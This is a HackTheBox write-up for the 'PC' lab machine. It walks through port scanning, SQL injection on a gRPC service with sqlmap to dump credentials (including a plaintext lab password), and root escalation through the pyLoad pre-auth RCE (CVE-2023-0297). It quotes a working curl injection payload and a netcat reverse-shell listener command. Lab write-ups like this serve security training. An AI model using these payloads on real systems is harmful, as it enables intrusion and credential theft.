HackTheBox - PC

HackTheBox - PC

OS: Linux || Difficulty: Easy

·

4 min read

Summary

In this box, an unknown port leads us to enumerate a possible technology and build an instance of it locally on our kali. We will leverage an SQL Injection to gain credentials into the machine and once there, we will find an internal port that holds vulnerable technology that will elevate us to root.

Enumeration

We begin our journey with an nmap scan. We will use -Pn to ignore ping responses, as a simple nmap scan doesn't seem to work.

nmap -p- -T4 10.10.11.214 -Pn

The results show port 22(SSH) being open along with port 50051, which is marked as unknown. Let's resort to the internet to find info about the specific port.

Nmap scan report for 10.10.11.214
Host is up (0.040s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
50051/tcp open  unknown

Our friend Google seems to tell us port 50051 is used for gRPC. According to its Wikipedia page, it is a "cross-platform open source high-performance remote procedure call framework".

With this information, we can now try to look for ways to around this technology.

Foothold

Once again, Google aids us and we find a medium article detailing a gRPC vulnerability.

https://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9

Within the article, there's a specific tool we need to use to arm gRPC locally on kali. This tool is called "grpcui" and has a GitHub page with instructions on how to install it.

https://github.com/fullstorydev/grpcui

Once done, we need to run the following command and we are good to go.

Once armed and looking at the contents, we can continue. The article mentions the use of Burp to capture HTTP responses, we will keep that in our minds for now.

The UI is straightforward, and offers us different methods: "LoginUser", "RegisterUser" and "getinfo". Let's create a test user and see where it takes us.

After doing so, we get a response. The next step is to log in.

After logging in, we should see our "id" number in the Response tab, along with an interesting token below the response output.

The third method, getinfo, seems to be a method that allows us to request data with user-generated tokens. Thankfully, we already have one.

Let's insert the token, and our id, and open up Burp Suite to check on what's going on.

After running some tests, it seems the "id" parameter might be vulnerable to an SQL Injection. The most efficient way to check on this is to save the HTTP request as a file and run it through SQLmap.

sqlmap -r sql.req -p id --risk=3 --dump

SQLmap does a great job and dumps credentials for us!

As we can see, we have admin:admin(doesn't work) and sau:HereIsYourPassword1431

Since port 22 is open, we should try these creds first over there.

As expected, we're able to SSH in and start our escalation work inside the machine. The user.txt file is ours to read now.

Escalation

Once inside, we find port 8000 is open. We will need to do some port forwarding to be able to see whatever is going on. This won't be a problem since we have SSH credentials.

With a quick set of commands we route the machine's port 8000 through kali's port 9999. Now all we need to do is open our browser and point it to 127.0.0.1:9999

We are greeted with a pyLoad login page. This seems like information we should try to leverage.

Great! A simple Google search reveals a potential RCE exploit affecting pyLoad.

https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad

The GitHub repo contains a TL;DR description:

"A code injection vulnerability in pyLoad versions prior to 0.5.0b3.dev31 leads to pre-auth RCE by abusing js2py's functionality."

It also contains a PoC we can use ourselves!

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://<target>/flash/addcrypted2'

Since our goal is to obtain a root shell, the easiest way to do so is to make the machine open a reverse shell we have crafted ourselves.

Below is a simple revshell that points to our kali machine. We will store it in the machine's /tmp/ directory so it's easy to locate.

After changing the PoC to match our needs(making the command open the reverse shell), we set our netcat listener and wait.

nc -lvnp 7777

Success! We are now root and can access the root.txt file.